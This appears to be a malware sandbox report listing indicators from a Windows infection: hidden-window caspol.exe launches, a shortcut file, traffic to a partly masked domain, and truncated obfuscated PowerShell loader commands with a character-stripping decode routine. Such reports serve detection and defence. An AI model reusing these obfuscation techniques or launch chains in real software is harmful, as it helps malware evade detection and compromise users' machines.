Technical Information
- %WINDIR%\microsoft.net\framework\v4.0.30319\caspol.exe
- %WINDIR%\microsoft.net\framework\v4.0.30319\caspol.exe
- %HOMEPATH%\documents\frowzled2.lnk
- 'su#####echcenter.com':443
- 'su#####echcenter.com':443
- DNS ASK su#####echcenter.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$Rationers = """SFPuFnRcPtUiioUnK ScfaUnUefsAcMesnTeP0O0I H{PpKaTrOaCmD(m[DSStTrHiOnFgH]S`$FMFoSnTyQ)J;SFSourD(G`$VFKoArKsHlJaSgSsUsEtpiSlDlPeBrDePnHsK=S1R;S B`$VFRoUrOsFlSaCgAsTsStAiDlSlDeIrK...' (with hidden window)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\caspol.exe' ' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c echo REG_SZ
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$Rationers = """SFPuFnRcPtUiioUnK ScfaUnUefsAcMesnTeP0O0I H{PpKaTrOaCmD(m[DSStTrHiOnFgH]S`$FMFoSnTyQ)J;SFSourD(G`$VFKoArKsHlJaSgSsUsEtpiSlDlPeBrDePnHsK=S1R;S B`$VFRoUrOsFlSaCgAsTsStAiDlSlDeIrK...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "Function canescene00 {param([String]$Mony);For($Forslagsstillerens=1; $Forslagsstillerens -lt $Mony.Length-1; $Forslagsstillerens+=(1+1)){$Falsify122 = $Falsify122 + $Mony.Substring($Forslagss...
- '%WINDIR%\microsoft.net\framework\v4.0.30319\caspol.exe'